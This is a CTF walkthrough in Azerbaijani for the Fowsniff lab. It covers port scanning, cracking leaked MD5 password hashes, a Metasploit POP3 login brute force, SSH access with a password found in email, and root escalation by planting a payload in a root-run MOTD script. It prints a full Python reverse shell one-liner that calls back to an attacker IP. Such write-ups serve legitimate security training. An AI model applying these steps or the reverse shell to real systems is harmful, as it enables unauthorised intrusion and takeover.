Telegram kanalına qoşularaq bu və digər mövzular üzrə quizlərdə iştirak edə bilərsiniz!
Telegram (Kanal): https://t.me/xakeraz_official
Paylaşım müəllifi: Valida Babayeva ( https://medium.com/@validababayeva222 )
Paylaşıma istinad: https://medium.com/@validababayeva222/fowsniff-ctf-88f43817b727

Hərkəsə Salam.Bu gün sizlərlə Fowsniff CTF-in həllini paylaşacam:
İlk öncə bütün CTF-lərdə olduğu kimi nmap əmri ilə başlayırıq ki, açıq portları və bu portlarda çalışan servisləri görək:

-A (aqressiv skan): Daha geniş məlumat əldə etmək üçün istifadə edirik
-T4: Daha tez nəticə almaq üçün istifadə edirik
80 portuna baxdığımız zaman:

Burada Fowsniff Corp saytının hakerlər tərəfindən ələ keçirilməsi haqqında məlumat görürük.Araşdıraq görək hansı məlumatlar ələ keçirilib tapa bilirikmi:


Email istifadəçilərinin parolları ələ keçirilib, amma burada parollar md5 hash-i ilə hash-lənmiş formadadır.İndi hash-ləri crackstation-dan istifadə edərək qırmağa çalışaq:

Birindən başqa hamısını qıra bildik.
İndi isə metasploitdə auxiliary/scanner/pop3/pop3_login modulundan istifadə edərək hər istifadəçi üçün pop3 servsinə qarşı giriş testləri edək:
Bunun üçün istifadəçi adlarını və parolları ayrı fayllara yığıb modula daxil edin, daha sonra RHOSTS hissəsinə də hədəfin İP ünvanını qeyd edib ‘run’ əmrini işlədin:




Indi seina istifadəçisinin pop3 servisinə daxil olaq:

Email-lərə baxdığımız zaman ssh üçün müvəqqəti parolun “S1ck3nBluff+secureshell” olduğunu görürük və digər email-dən isə istifadəçi adını götürüb ssh bağlanırıq sistemə:


Indi isə imtiyazlarımızı yüksəldib root istifadəçisə yüksəlməyə çalışaq.Əgər sistemə baxsaq belə bir fayl tapacıq:

Bu fayl hər dəfə sistemə ssh bağlantısı etdikdə root kimi çalışdırırlır.Bunu haradanmı bilirik?
Çünki bu fayl /etc/motd.d/ qovluğunda yerləşir və bu da o deməkdir ki, bu fayl root hüquqları ilə icra edilir.Çünki MOTD ilə bağlı bütün əmrlər sistemin girişində, root tərəfindən icra edilir.
Deməli biz bu sh faylının içinə reverse shell payloadı yazıb sistemdən çıxış edib yenidən daxil olsaq onda root shell-i almalıyıq.Baxaq:
- Reverse shell payloadı:python3 -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.9.2.107”,4445));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’

2.Daha sonra öz maşınımızdan netcat vasitəsilə dinləmə aparıb sistemdən çıxıb yenidən ssh bağlanmağa çalışaq:

Və budur CTF-i sonlandırdıq:

Ümid edirəm sizin üçün faydalı olmuşdur 🙂
Əgər bəyəndinizsə “clap” etməyi və hesaba abunə olmağı unutmayın 🙂